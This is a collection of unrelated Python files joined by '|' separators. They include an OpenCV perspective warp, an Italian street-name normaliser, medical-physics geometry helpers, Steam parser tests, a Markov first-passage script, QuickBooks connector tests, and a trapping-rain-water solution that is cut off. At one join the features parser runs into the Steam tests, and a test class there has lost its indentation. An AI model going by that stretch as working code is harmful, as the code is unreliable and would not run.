# if cv.waitKey(1) & 0xFF == ord('q'):
# break
# Mark the four source corners used for the perspective transform.
cv.circle(image,(122,5),1,(255,0,0),3)
cv.circle(image,(253,31),1,(255,1,1),3)
cv.circle(image,(4,88),1,(255,0,0),3)
cv.circle(image,(152,192),1,(255,0,0),3)
# Source corners and their destination positions in the output rectangle.
points1 = np.float32([[4,88],[152,192],[122,5],[253,31]])
points2 = np.float32([[0,0],[253,0],[0,192],[253,192]])
# Warp the marked quadrilateral onto an upright 253x192 rectangle.
m = cv.getPerspectiveTransform(points1,points2)
transformed_image = cv.warpPerspective(image,m,(253,192))
cv.imshow("transformed image",transformed_image)
cv.imshow("goku",image)
# Block until a key press, keeping the windows open.
cv.waitKey(0)
|
# -*- coding: iso-8859-15 -*-
"""
Normalize street name using Italian OSM conventions:
https://wiki.openstreetmap.org/wiki/IT:Key:name
Copyright (C) 2014-2015 Andrea Musuruane <musuruan@gmail.com>
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Library General Public
License as published by the Free Software Foundation; either
version 2 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Library General Public License for more details.
You should have received a copy of the GNU Library General Public
License along with this library; if not, write to the
Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
Boston, MA 02110-1301, USA.
"""
__author__ = "Andrea Musuruane <musuruan@gmail.com>"
__version__ = "1.2"
__date__ = "29 May 2015"
import re
import sys
def translateName(streetName):
    """Normalize an Italian street name following OSM conventions.

    Expands a leading DUG abbreviation and known abbreviations, title-cases
    the result, lowercases connective words again, and fixes spacing
    around full stops.
    """
    # Words that must stay lowercase after title-casing. The trailing space
    # (or apostrophe) anchors each match to a word boundary.
    words = [
        # Preposizioni
        "ai ",
        "al ",
        "alla ",
        "alle ",
        "d'",
        "da ",
        "di ",
        "de ",
        "per ",
        # Preposizioni articolate
        "dal ",
        "della ",
        "delle ",
        "del ",
        "dei ",
        "dello ",
        "degli ",
        "dell'",
        # Congiunzioni
        "e ",
        "ed ",
        # Altre parole
        "antica ",
        "privata ",
        "vecchia "
    ]
    abbreviations = {
        "COL.": "COLONNELLO",
        "F.LLI": "FRATELLI",
    }
    dug_abbreviations = {
        "C.DA": "CONTRADA",
        "C.LE": "CORTILE",
        "C.LLA": "CORTICELLA",
        "C.NE": "CIRCONVALLAZIONE",
        "C.SO": "CORSO",
        "G.RIA": "GALLERIA",
        "IN.TO": "INTERRATO",
        "L.GE": "LUNGADIGE",
        "L.GO": "LARGO",
        "P.LE": "PIAZZALE",
        "P.TTA": "PIAZZETTA",
        "P.TTI FONT.LLE": "PORTICHETTI FONTANELLE",
        "P.ZZA": "PIAZZA",
        "R.STE": "REGASTE",
        "S.DA": "STRADA",
        "S.LLA": "STRADELLA",
        "S.NE": "STRADONE",
        "S.TA": "SALITA",
        "SC.NE": "SCALONE",
        "SC.TA": "SCALETTA",
        "V.GIO": "VILLAGGIO",
        "V.LE": "VIALE",
        "V.LO": "VICOLO",
        "V.TTO": "VICOLETTO"
    }
    # Expand a leading DUG ("denominazione urbanistica generica"), if any.
    for dug, expansion in dug_abbreviations.items():
        if streetName.startswith(dug + " "):
            streetName = expansion + streetName[len(dug):]
            break
    # Expand the remaining known abbreviations anywhere in the name.
    for abbreviation, expansion in abbreviations.items():
        streetName = streetName.replace(abbreviation, expansion)
    # Title-case the whole name...
    streetName = streetName.strip().title()
    # ...then put the connective words back in lowercase.
    for word in words:
        streetName = streetName.replace(word.title(), word)
    # A full stop must be followed by a space.
    streetName = re.sub(r"\.(\S)", r". \1", streetName)
    # Collapse runs of whitespace into single spaces.
    streetName = re.sub(r"\s\s+", " ", streetName)
    return streetName
|
def reponse():
    """Answer to exercise 6: the smallest n such that u_n >= 1000.

    Here u_n is the partial sum of 1/sqrt(k) for k = 1..n.
    """
    total = 0
    k = 0
    # Invariant at the top of each iteration: total == u_k.
    while total < 1000:
        k = k + 1
        total = total + k**(-.5)
    # total just crossed 1000, so u_k is the first value >= 1000.
    return k
def valeur_u(n):
    """Return u_n, the partial sum of 1/sqrt(k) for k = 1..n."""
    # sum() accumulates left to right from 0, matching a manual loop exactly.
    return sum(k**-.5 for k in range(1, n + 1))
def reponse2():
    """Answer to exercise 6 (variant): smallest n with u_n >= 1000."""
    total, count = 0, 0
    while total < 10**3:
        # Invariant at the top of the loop: total == u_count.
        count = count + 1
        total = total + count**-.5
    return count
|
# Copyright (C) 2019 Cancer Care Associates
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pymedphys._imports import matplotlib
from pymedphys._imports import numpy as np
import pymedphys._utilities.createshells
def transform_penumbra_points(points_at_origin, centre, rotation):
    """Map origin-centred penumbra sampling points onto an actual field.

    Args:
        points_at_origin: Tuple (xx_left_right, yy_left_right, xx_top_bot,
            yy_top_bot) as produced by ``define_penumbra_points_at_origin``.
        centre: (x, y) translation applied after rotation.
        rotation: Rotation angle in degrees (applied as -rotation).

    Returns:
        Tuple of the four transformed coordinate arrays, same order as input.
    """
    transform = translate_and_rotate_transform(centre, rotation)
    xx_left_right, yy_left_right, xx_top_bot, yy_top_bot = points_at_origin
    xx_left_right_transformed, yy_left_right_transformed = apply_transform(
        xx_left_right, yy_left_right, transform
    )
    xx_top_bot_transformed, yy_top_bot_transformed = apply_transform(
        xx_top_bot, yy_top_bot, transform
    )
    return (
        xx_left_right_transformed,
        yy_left_right_transformed,
        xx_top_bot_transformed,
        yy_top_bot_transformed,
    )
def translate_and_rotate_transform(centre, rotation):
    """Build an affine transform: rotate by -rotation degrees, then translate by centre.

    On a ValueError from matplotlib the offending inputs are printed for
    debugging before the exception is re-raised.
    """
    transform = matplotlib.transforms.Affine2D()
    try:
        transform.rotate_deg(-rotation)
        transform.translate(*centre)
    except ValueError:
        # Surface the bad inputs, then propagate.
        print(centre, rotation)
        raise
    return transform
def define_penumbra_points_at_origin(edge_lengths, penumbra):
    """Sampling grids straddling the four penumbra edges of an origin-centred field.

    For each pair of opposite edges, sample 11 offsets across the penumbra
    at 51 positions along the central half of the orthogonal edge.

    Args:
        edge_lengths: (x_length, y_length) of the field.
        penumbra: Penumbra width; samples span +/- penumbra / 2 per edge.

    Returns:
        Tuple (xx_left_right, yy_left_right, xx_top_bot, yy_top_bot).
    """
    penumbra_offsets = np.linspace(-penumbra / 2, penumbra / 2, 11)

    def _edge_lookups(edge_length, orthogonal_length):
        # 51 positions along the middle half of the orthogonal edge.
        along_edge = np.linspace(-orthogonal_length / 4, orthogonal_length / 4, 51)
        # Penumbra samples around both opposite edges (-L/2 and +L/2).
        across_edges = np.concatenate(
            [-edge_length / 2 + penumbra_offsets, edge_length / 2 + penumbra_offsets]
        )
        return across_edges, along_edge

    xx_left_right, yy_left_right = np.meshgrid(*_edge_lookups(edge_lengths[0], edge_lengths[1]))
    # Reverse the argument order so x varies along the rows for top/bottom.
    xx_top_bot, yy_top_bot = np.meshgrid(*_edge_lookups(edge_lengths[1], edge_lengths[0])[::-1])
    return xx_left_right, yy_left_right, xx_top_bot, yy_top_bot
def transform_rotation_field_points(points_at_origin, centre, rotation):
    """Translate/rotate the flattened rotation-field ring points onto the
    field position."""
    transform = translate_and_rotate_transform(centre, rotation)
    xx_flat, yy_flat = points_at_origin
    # (Local names also fix the "tranformed" misspelling of the original.)
    transformed_xx, transformed_yy = apply_transform(xx_flat, yy_flat, transform)
    return transformed_xx, transformed_yy
def define_rotation_field_points_at_origin(edge_lengths, penumbra):
    """Create a flattened ring of sample points on/outside the field boundary.

    A grid with 8 samples per unit is laid over the field-plus-half-penumbra
    extent; points strictly inside the boundary are discarded, leaving only
    the boundary/edge ring.  Returns flat ``(xx, yy)`` arrays.
    """
    half_x = edge_lengths[0] / 2 + penumbra / 2
    half_y = edge_lengths[1] / 2 + penumbra / 2

    x = np.linspace(-half_x, half_x, int(np.ceil(half_x * 2 * 8) + 1))
    y = np.linspace(-half_y, half_y, int(np.ceil(half_y * 2 * 8) + 1))

    xx, yy = np.meshgrid(x, y)
    xx_flat = np.ravel(xx)
    yy_flat = np.ravel(yy)

    # Keep the complement of the strict interior (De Morgan of the original
    # "inside" mask): |x| >= half_x or |y| >= half_y.
    on_or_outside = np.logical_or(
        np.abs(xx_flat) >= half_x, np.abs(yy_flat) >= half_y
    )
    return xx_flat[on_or_outside], yy_flat[on_or_outside]
def apply_transform(xx, yy, transform):
    """Apply an affine ``transform`` to coordinate grids ``xx`` and ``yy``.

    The grids are flattened, lifted to homogeneous coordinates, multiplied by
    ``transform`` (anything supporting ``@`` with a (3, N) array), and the
    results are reshaped back to the input shape.

    Returns ``(xx_transformed, yy_transformed)`` with the same shape as the
    inputs.
    """
    # Fix: np.array(..., copy=False) raises ValueError on NumPy >= 2.0
    # whenever a copy is required (e.g. list input).  np.asarray has the
    # intended "avoid a copy when possible" semantics on all NumPy versions.
    xx = np.asarray(xx)
    yy = np.asarray(yy)

    xx_flat = np.ravel(xx)
    yy_flat = np.ravel(yy)
    # Homogeneous coordinates: rows are x, y, 1.
    transformed = transform @ np.vstack([xx_flat, yy_flat, np.ones_like(xx_flat)])

    xx_transformed = transformed[0]
    yy_transformed = transformed[1]

    xx_transformed.shape = xx.shape
    yy_transformed.shape = yy.shape

    return xx_transformed, yy_transformed
def create_bb_points_function(bb_diameter):
    """Build a sampler of concentric shell points covering a ball bearing.

    Shells of 2-D points are generated from the centre out to the BB radius
    in 11 steps.  Returns ``(points_to_check, dist)`` where
    ``points_to_check(bb_centre)`` shifts the template onto a candidate
    centre and ``dist`` holds each point's shell radius.
    """
    max_distance = bb_diameter * 0.5
    min_distance = 0
    num_steps = 11
    min_dist_between_points = (max_distance - min_distance) / num_steps
    distances = np.arange(
        min_distance, max_distance + min_dist_between_points, min_dist_between_points
    )

    x_shells = []
    y_shells = []
    dist_shells = []
    for distance in distances:
        (
            shell_x,
            shell_y,
        ) = pymedphys._utilities.createshells.calculate_coordinates_shell_2d(  # pylint: disable = protected-access
            distance, min_dist_between_points
        )
        x_shells.append(shell_x)
        y_shells.append(shell_y)
        dist_shells.append(distance * np.ones_like(shell_x))

    x = np.concatenate(x_shells)
    y = np.concatenate(y_shells)
    dist = np.concatenate(dist_shells)

    def points_to_check(bb_centre):
        # Shift the origin-centred template onto the candidate BB centre.
        return x + bb_centre[0], y + bb_centre[1]

    return points_to_check, dist
def create_centralised_field(field, centre, rotation):
    """Wrap ``field`` so it is evaluated in the centred/rotated frame."""
    transform = translate_and_rotate_transform(centre, rotation)

    def new_field(x, y):
        # Map the requested coordinates into the original field's frame.
        return field(*apply_transform(x, y, transform))

    return new_field
|
# Django may be missing or unconfigured when this package is imported outside
# of a Django project (e.g. from setup.py); alias ImproperlyConfigured to
# ImportError so the except clause below catches both situations.
try:
    from django.core.exceptions import ImproperlyConfigured
except ImportError:
    ImproperlyConfigured = ImportError
try:
    from .base import ViewSet
    from .model import ModelViewSet
# Allows to see module metadata outside of a Django project
# (including setup.py).
except (ImportError, ImproperlyConfigured):
    pass
from .patterns import PK, SLUG

# Package metadata.
__author__ = 'Bertrand Bordage'
__credits__ = ('Bertrand Bordage',)
__license__ = 'BSD License'
__version__ = '0.2.0'
__maintainer__ = 'Bertrand Bordage'
__email__ = 'bordage.bertrand@gmail.com'
__status__ = '3 - Alpha'
|
def main(N, A):
    """Return "YES" when the N values in A are pairwise distinct, else "NO".

    Note: sorts ``A`` in place, which callers can observe.
    """
    A.sort()
    # After sorting, any duplicates must be adjacent.
    if any(A[i] == A[i + 1] for i in range(N - 1)):
        return "NO"
    return "YES"
# Read the element count, then the space-separated integers, from stdin.
N = int(input())
A = list(map(int , input().split()))
print(main(N , A)) |
from pydantic import BaseModel, validator
import re
import os.path
class TranslationModel(BaseModel):
    """Pydantic schema for a page-translation payload.

    The id-like string fields must contain only ASCII digits; ``file`` must
    point to an existing file on disk.
    """

    metadata: list
    content_data: list
    language: str
    draft_by: str
    slug: str
    permalink: str
    created_by: str
    allowed_children: str
    title: str
    is_published: str
    file: str

    @validator('language', 'draft_by', 'created_by', 'title', 'is_published')
    def must_be_int(cls, v):
        """Reject values containing anything other than ASCII digits."""
        if re.match('^[0-9]*$', v) is None:
            raise ValueError('Must contain only numbers')
        return v.title()  # no-op for digit-only strings

    @validator('file')
    def must_file_exist(cls, v):
        """Ensure the path exists; store it unmodified."""
        if os.path.exists(v) is False:
            raise ValueError('Must contain path to existing file')
        # Bug fix: previously returned v.title(), which re-cases the path
        # (e.g. '/tmp/a.txt' -> '/Tmp/A.Txt') and so stores a path that no
        # longer satisfies the existence check on case-sensitive filesystems.
        return v
|
__author__ = 'cboys'
import re
import json
import sys
##########################################################
##
## features_parser.py
##
## Code to parse and store the user features
## from the Kaggle Facebook egonets data.
## Take features.txt as input and output a list of
## key-value dictionaries, one for each user, with more
## sensible key names.
##
## 25-10-2014
##
## run as:
## python features_parser.py 'str.txt'
##
##########################################################
# NOTE: Python 2 script (print statements without parentheses).
if __name__ == '__main__':
    if len(sys.argv)<2:
        print "Expected features file.."
        sys.exit(0)
    # Read the whole features file and split each line on single spaces.
    with open(sys.argv[1]) as f:
        content=f.readlines()
    contents=[]
    for i in range(0,len(content)):
        contents.append(content[i].split(' '))
    #for item in contents:
    #    for entry in item:
    #        entry = re.sub('([\D])([;])([\D])','\g<1>_\g<3>',entry)
    # Replace any ';' flanked by two non-digits with '_', so each token keeps
    # a single 'key;value' shape before the split on ';' below.
    for i in range(0,len(contents)):
        for j in range(0,len(contents[i])):
            contents[i][j]=re.sub('([\D])([;])([\D])','\g<1>_\g<3>',contents[i][j])
    ## Question: why the hell didn't that work
    ## iterating through the list by item normally???
    ## (Review note: rebinding the loop variable does not write back into the
    ## list; in-place replacement needs indexed assignment as done above.)
    # Token 0 on each line is the user id; tokens 1.. are key;value features.
    features_dict_list=[]
    for i in range(0,len(contents)):
        features_dict_list.append({})
        for j in range(1,len(contents[i])):
            features_dict_list[i][contents[i][j].split(';')[0]]=int(contents[i][j].split(';')[1])
    # Append one JSON dictionary per user (note: 'a' mode appends on reruns).
    with open('clean_features.txt','a') as final_file:
        for item in features_dict_list:
            json.dump(item,final_file)
            final_file.write('\n')
    # final_file=open('clean_features.txt','w')
    # for item in features_dict_list:
    #    final_file.write('%s\n' %item)
    # final_file.close()
    ## This really should be json so Python can
    ## read the dictionaries later...
import os
from typing import Any
from unittest import TestCase
from service.steam.model import SteamUserProfile, SteamMembersPage, SteamGroupMember, SteamErrorPage
from service.steam.parsers import SteamUserProfilePageParser, SteamParserError, SteamMembersPageParser, SteamErrorPageParser, \
NoPageParser
class MyTestCase(TestCase):
"""
Note:
This class uses MRO dependency injection
"""
def parse(self, filename: str) -> Any:
# noinspection PyUnresolvedReferences
return super().parse(self.load_asset(filename))
@staticmethod
def get_asset_path(*path_elements: str) -> str:
return os.path.join(os.getcwd(), 'assets', *path_elements)
def load_asset(self, filename: str) -> bytes:
with open(self.get_asset_path(filename), 'rb') as f:
return f.read()
def test_get_asset_path_is_correct(self):
self.assertTrue(os.path.exists(self.get_asset_path('steam-members-drake-ark-server.html')), msg=os.getcwd())
class TestSteamMembersPageParser(MyTestCase, SteamMembersPageParser):
    def test_parse(self):
        """A members page yields the group metadata and known members."""
        page = self.parse('steam-members-drake-ark-server.html')
        self.assertIsInstance(page, SteamMembersPage)
        self.assertEqual(page.group_name, 'Land of Dragons Ark Server')
        self.assertEqual(page.num_members, 10)
        self.assertEqual(len(page.members), page.num_members)
        known_members = (
            SteamGroupMember('Vas', 'Group Owner', 'https://steamcommunity.com/id/VasVadum'),
            SteamGroupMember('Raziel2212', 'Group Moderator', 'https://steamcommunity.com/id/Raziel2212'),
            SteamGroupMember('Poketkobold', 'Member', 'https://steamcommunity.com/profiles/76561198112492431'),
        )
        for known in known_members:
            self.assertIn(known, page.members, msg=known)

    def test_parse_non_group(self):
        """Pages that are not group member lists raise SteamParserError."""
        for filename in ('steam-members-error.html', 'steam-group-error.html'):
            with self.assertRaises(SteamParserError, msg=filename):
                self.parse(filename)
class TestSteamUserProfilePageParser(MyTestCase, SteamUserProfilePageParser):
    def test_parse(self):
        """A profile page yields the expected url, steam id and name."""
        profile = self.parse('steam-profile-vas.html')
        self.assertIsInstance(profile, SteamUserProfile)
        expectations = {
            'url': 'https://steamcommunity.com/id/VasVadum',
            'steam_id': '76561198023716890',
            'name': 'Vas',
        }
        for attribute, expected in expectations.items():
            self.assertEqual(getattr(profile, attribute), expected)

    def test_parse_non_profile(self):
        """Pages that are not user profiles raise SteamParserError."""
        for filename in ('steam-members-drake-ark-server.html', 'steam-members-error.html'):
            with self.assertRaises(SteamParserError, msg=filename):
                self.parse(filename)
class TestSteamErrorPageParser(MyTestCase, SteamErrorPageParser):
    def test_parse(self):
        """A Steam error page yields its error message."""
        error_page = self.parse('steam-members-error.html')
        self.assertIsInstance(error_page, SteamErrorPage)
        self.assertEqual(error_page.message, 'No group could be retrieved for the given URL.')

    def test_parse_non_error(self):
        """Non-error pages raise SteamParserError."""
        for filename in ('steam-members-drake-ark-server.html', 'steam-profile-vas.html'):
            with self.assertRaises(SteamParserError):
                self.parse(filename)
class TestParserBooleanness(MyTestCase):
    def test_regular_parsers_are_true(self):
        """Real parser classes and their instances are truthy."""
        for parser_class in (
            SteamUserProfilePageParser,
            SteamMembersPageParser,
            SteamErrorPageParser,
        ):
            self.assertTrue(parser_class, msg=parser_class)
            self.assertTrue(parser_class(), msg=parser_class)

    def test_noparser_evaluates_to_false(self):
        """The null-object parser is falsy."""
        self.assertFalse(NoPageParser())
|
import os
import h5py
import numpy as np
import numpy.ma as ma
import argparse
import sys
#path to mother scripts
sys.path.append('/home/a/antonio-costa/theory_manuscript/')
import new_op_calc as op_calc
import time
from scipy.sparse import csr_matrix,lil_matrix
from scipy.integrate import trapz
def get_model(labels, delay):
    """Build a Markov model of the symbolic trajectory at the given delay.

    Returns ``(P, phi2, thresh_idx)``: the transition matrix, the second
    (slowest non-trivial) reversible eigenfunction, and the index of the
    optimal two-state split along phi2.
    """
    lcs, P = op_calc.transition_matrix(labels, delay, return_connected=True)
    inv_measure = op_calc.stationary_distribution(P)
    # Result unused; the call is kept in case it has side effects in op_calc.
    final_labels = op_calc.get_connected_labels(labels, lcs)
    R = op_calc.get_reversible_transition_matrix(P)
    # Only the eigenvectors are needed (unused eigvals dropped).
    _, eigvecs = op_calc.sorted_spectrum(R, k=2)
    eigfunctions = eigvecs.real / np.linalg.norm(eigvecs.real, axis=0)
    phi2 = eigfunctions[:, 1]
    # Only the split index is consumed downstream (other returns dropped).
    _, _, thresh_idx, _ = op_calc.optimal_partition(
        phi2, inv_measure, P, return_rho=True
    )
    return P, phi2, thresh_idx
def organize_matrix(P, phi2):
    """Symmetrically permute ``P`` so states are ordered by increasing phi2.

    Builds the permutation matrix S from ``argsort(phi2)`` and returns
    ``S * P.T * S.T`` (sparse).
    """
    order = np.argsort(phi2)
    S = lil_matrix(P.shape)
    S[np.arange(order.shape[0]), order] = 1
    return S * P.T * S.T
def compute_fpt_dist(labels,delay,kd_max=2000,tol=1e-5,dt=.01):
    """Compute first-passage-time distributions between the two metastable
    sets of the model built at ``delay``.

    Returns (kd_range, f, timescales): the evaluated step range, the per-step
    passage probabilities for each direction, and the mean first-passage
    times (trapz of kd*f, scaled by delay*dt*.5).

    NOTE: A_dense comes from .todense() and is therefore np.matrix, so ``*``
    is matrix multiplication and ``**kd`` is a matrix power below -- do not
    refactor to plain ndarrays without changing those operators.
    """
    P,phi2,thresh_idx = get_model(labels,delay)
    A = organize_matrix(P,phi2)
    eigvals,eigvecs = op_calc.sorted_spectrum(A,k=2)
    A_dense = A.todense()
    # Stationary distribution from the leading eigenvector, normalised.
    p_star = eigvecs[:,0].real/eigvecs[:,0].real.sum()
    # Block decomposition of the reordered matrix at the partition index.
    # NOTE(review): the Aba/Aab names look swapped relative to the usual
    # row/column block convention -- confirm before relying on direction.
    Aaa = A_dense[:thresh_idx,:thresh_idx]
    Abb = A_dense[thresh_idx:,thresh_idx:]
    Aba = A_dense[:thresh_idx,thresh_idx:]
    Aab = A_dense[thresh_idx:,:thresh_idx]
    w_a = p_star[:thresh_idx].reshape(-1,1)
    w_b = p_star[thresh_idx:].reshape(-1,1)
    ua = np.ones((1,Aaa.shape[0]))
    ub = np.ones((1,Abb.shape[0]))
    kd_range = np.arange(kd_max)
    f = np.zeros((kd_range.shape[0],2))
    # Accumulate passage probabilities until both columns sum to ~1.
    for kd in kd_range:
        f[kd,0] = (ub*Aab*(Aaa**kd)*Aba*w_b)/(ua*Aba*w_b)
        f[kd,1] = (ua*Aba*(Abb**kd)*Aab*w_a)/(ub*Aab*w_a)
        if np.all(np.array([1.,1.])-f[:kd+1,:].sum(axis=0)<tol):
            break
        print(kd,f[:kd+1,:].sum(axis=0),flush=True)
    return kd_range,f,trapz(kd_range.reshape(-1,1)*f,kd_range,axis=0)*delay*dt*.5
def main(argv):
    """CLI driver: compute first-passage statistics over a range of delays
    for one symbolic trajectory and write them to an HDF5 file."""
    parser = argparse.ArgumentParser()
    parser.add_argument('-n_clusters','--NClusters',help="num clusters",default=3162,type=int)
    parser.add_argument('-idx','--Idx',help="traj idx",default=249,type=int)
    parser.add_argument('-delay0','--D0',help="first delay",default=2,type=int)
    parser.add_argument('-delayf','--Df',help="last delay",default=200,type=int)
    args=parser.parse_args()
    n_clusters = args.NClusters
    d0,df = args.D0,args.Df
    delay_range = np.arange(d0,df,2)
    print(delay_range,flush=True)
    #delay_range = np.array([10,50,100,500])
    t0_ = time.time()
    #path to split symbolic trajectories
    f = h5py.File('/flash/StephensU/antonio/Lorenz/split_trajs/split_dtrajs_{}_clusters.h5'.format(n_clusters),'r')
    d_ = f[str(args.Idx)]
    # Masked integer labels: entries flagged in 'mask' are treated as missing.
    labels = ma.array(d_['traj'],dtype=int)
    mask = np.array(d_['mask'],dtype=int)
    labels[mask==1] = ma.masked
    seq_length = np.array(f['seq_length'],dtype=int)[0]
    f.close()
    print(labels[:10],labels.shape,labels.compressed().shape,flush=True)
    dt = 0.01
    #change output path
    outpath = '/flash/StephensU/antonio/Lorenz/kinetic_properties/'
    f = h5py.File(outpath+'kinetic_properties_{}_clusters_idx_{}_delays_{}_{}.h5'.format(n_clusters,args.Idx,d0,df),'w')
    fd_delay = f.create_group('full_dist')
    kd_delay = f.create_group('evaluated_steps')
    #delay_range=np.arange(200,1200,200)
    timps = np.zeros((delay_range.shape[0],2))
    # One first-passage computation per delay; store distribution and steps.
    for kd,delay in enumerate(delay_range):
        kd_range,fd,tscales = compute_fpt_dist(labels,delay)
        timps[kd] = np.sort(tscales)
        print(delay*dt,fd.sum(axis=0),timps[kd],flush=True)
        fd_save = fd_delay.create_dataset(str(kd),fd.shape)
        fd_save[...] = fd
        kd_save = kd_delay.create_dataset(str(kd),kd_range.shape)
        kd_save[...] = kd_range
        #print(kd,flush=True)
    timps_ = f.create_dataset('timps',timps.shape)
    timps_[...]=timps
    f.close()
    tf_ = time.time()
    print('It took {:.2f}s'.format(tf_-t0_))
# Script entry point.
if __name__ == "__main__":
    main(sys.argv)
|
"""
QBO DB Connector Integration Tests
"""
import logging
from test.common.utilities import dict_compare_keys, dbconn_table_row_dict
from .conftest import dbconn
logger = logging.getLogger(__name__)
def test_accounts(qbo_ex, mock_qbo):
    """
    Test QBO Extract accounts
    :param qbo_ex: qbo_ex extract instance
    :param mock_qbo: mock instance
    :return: None
    """
    qbo_ex.extract_accounts()
    extracted = dbconn_table_row_dict(dbconn(), 'qbo_extract_accounts')
    expected = mock_qbo.accounts.get()[0]
    assert dict_compare_keys(extracted, expected) == [], \
        'qbo_extract.extract_accounts has stuff that mock_qbo.accounts.get doesnt'
    assert dict_compare_keys(expected, extracted) == [], \
        'mock_qbo.accounts.get() has stuff that qbo_extract.extract_accounts doesnt'
def test_employees(qbo_ex, mock_qbo):
    """
    Test QBO Extract employees
    :param qbo_ex: qbo_ex extract instance
    :param mock_qbo: mock instance
    :return: None
    """
    qbo_ex.extract_employees()
    extracted = dbconn_table_row_dict(dbconn(), 'qbo_extract_employees')
    expected = mock_qbo.employees.get()[0]
    assert dict_compare_keys(extracted, expected) == [], \
        'qbo_extract.extract_employees has stuff that mock_qbo.employees.get doesnt'
    assert dict_compare_keys(expected, extracted) == [], \
        'mock_qbo.employees.get() has stuff that qbo_extract.extract_employees doesnt'
def test_departments(qbo_ex, mock_qbo):
    """
    Test QBO Extract departments
    :param qbo_ex: qbo_ex extract instance
    :param mock_qbo: mock instance
    :return: None
    """
    qbo_ex.extract_departments()
    extracted = dbconn_table_row_dict(dbconn(), 'qbo_extract_departments')
    expected = mock_qbo.departments.get()[0]
    assert dict_compare_keys(extracted, expected) == [], \
        'qbo_extract.extract_departments has stuff that mock_qbo.departments.get doesnt'
    assert dict_compare_keys(expected, extracted) == [], \
        'mock_qbo.departments.get() has stuff that qbo_extract.extract_departments doesnt'
def test_classes(qbo_ex, mock_qbo):
    """
    Test QBO Extract classes
    :param qbo_ex: qbo_ex extract instance
    :param mock_qbo: mock instance
    :return: None
    """
    qbo_ex.extract_classes()
    extracted = dbconn_table_row_dict(dbconn(), 'qbo_extract_classes')
    expected = mock_qbo.classes.get()[0]
    assert dict_compare_keys(extracted, expected) == [], \
        'qbo_extract.extract_classes has stuff that mock_qbo.classes.get doesnt'
    assert dict_compare_keys(expected, extracted) == [], \
        'mock_qbo.classes.get() has stuff that qbo_extract.extract_classes doesnt'
def test_home_currency(qbo_ex, mock_qbo):
    """
    Test QBO Extract home_currency
    :param qbo_ex: qbo_ex extract instance
    :param mock_qbo: mock instance
    :return: None
    """
    qbo_ex.extract_home_currency()
    extracted = dbconn_table_row_dict(dbconn(), 'qbo_extract_home_currency')
    expected = mock_qbo.home_currency.get()[0]
    assert dict_compare_keys(extracted, expected) == [], \
        'qbo_extract.extract_home_currency has stuff that mock_qbo.home_currency.get doesnt'
    assert dict_compare_keys(expected, extracted) == [], \
        'mock_qbo.home_currency.get() has stuff that qbo_extract.extract_home_currency doesnt'
def test_exchange_rates(qbo_ex, mock_qbo):
    """
    Test QBO Extract exchange_rates
    :param qbo_ex: qbo_ex extract instance
    :param mock_qbo: mock instance
    :return: None
    """
    qbo_ex.extract_exchange_rates()
    extracted = dbconn_table_row_dict(dbconn(), 'qbo_extract_exchange_rates')
    expected = mock_qbo.exchange_rates.get()[0]
    assert dict_compare_keys(extracted, expected) == [], \
        'qbo_extract.extract_exchange_rates has stuff that mock_qbo.exchange_rates.get doesnt'
    assert dict_compare_keys(expected, extracted) == [], \
        'mock_qbo.exchange_rates.get() has stuff that qbo_extract.extract_exchange_rates doesnt'
def test_load_checks(qbo_lo, mock_qbo):
    """
    Test QBO Load checks
    :param qbo_lo: qbo load instance
    :param mock_qbo: mock instance
    :return: None
    """
    # Fix: open the fixture SQL with a context manager so the file handle is
    # closed deterministically (it was previously left open).
    with open('./test/common/mock_db_load.sql') as sql_file:
        sql = sql_file.read()
    dbconn().executescript(sql)
    check = qbo_lo.load_check(check_id='C1')
    mock_check = mock_qbo.purchases.save()
    assert dict_compare_keys(check, mock_check['Purchase']) == [], \
        'qbo_load.load_check has stuff that mock_qbo.load_check doesnt'
    assert dict_compare_keys(mock_check['Purchase'], check) == [], \
        'mock_qbo.load_check has stuff that qbo_load.load_check doesnt'
def test_load_journal_entries(qbo_lo, mock_qbo):
    """
    Test QBO Load journal_entries
    :param qbo_lo: qbo load instance
    :param mock_qbo: mock instance
    :return: None
    """
    # Fix: open the fixture SQL with a context manager so the file handle is
    # closed deterministically (it was previously left open).
    with open('./test/common/mock_db_load.sql') as sql_file:
        sql = sql_file.read()
    dbconn().executescript(sql)
    journal_entry = qbo_lo.load_journal_entry(journal_entry_id='J1')
    mock_journal_entry = mock_qbo.journal_entries.save()
    assert dict_compare_keys(journal_entry, mock_journal_entry['JournalEntry']) == [], \
        'qbo_load.load_journal_entry has stuff that mock_qbo.load_journal_entry doesnt'
    assert dict_compare_keys(mock_journal_entry['JournalEntry'], journal_entry) == [], \
        'mock_qbo.load_journal_entry has stuff that qbo_load.load_journal_entry doesnt'
|
class Solution:
    """Appears to implement the 'Trapping Rain Water' problem: given bar
    heights A, return the total trapped water -- TODO confirm against the
    original problem statement."""
    # @param A, a list of integers
    # @return an integer
    def computeTrap(self, seq, peak):
        # Sum (peak - height) over the interior elements of seq that are
        # below peak; the two end bars are excluded.
        l = len(seq)
        acc = 0
        for i in range(1, l - 1):
            if peak > seq[i]:
                acc = acc + (peak - seq[i])
        return acc
    def trap(self, A):
        """Scan for peak pairs and accumulate trapped water between them.

        NOTE(review): the statement order here is load-bearing (leftPeak /
        rightPeak / matched are mutated from several branches); do not
        reorder without re-verifying against known test cases.
        """
        # deltas[i] = A[i] - A[i-1]; sign classifies each step.
        deltas = [0]
        l = len(A)
        if l == 0:
            return 0
        for i in range(1, l):
            deltas.append(A[i] - A[i-1])
        leftPeakIdx = 0
        leftPeak = A[0]
        rightPeak = 0
        rightPeakIdx = 0
        matched = False
        acc = 0
        while leftPeakIdx < l:
            leftPeak = A[leftPeakIdx]
            rightPeak = 0
            for i in range(leftPeakIdx + 1, l):
                if deltas[i] < 0:
                    continue
                if deltas[i] == 0:
                    # Flat run at the current peak height: advance the left
                    # peak to this position.
                    if A[i] == leftPeak:
                        leftPeak = A[i]
                        leftPeakIdx = i
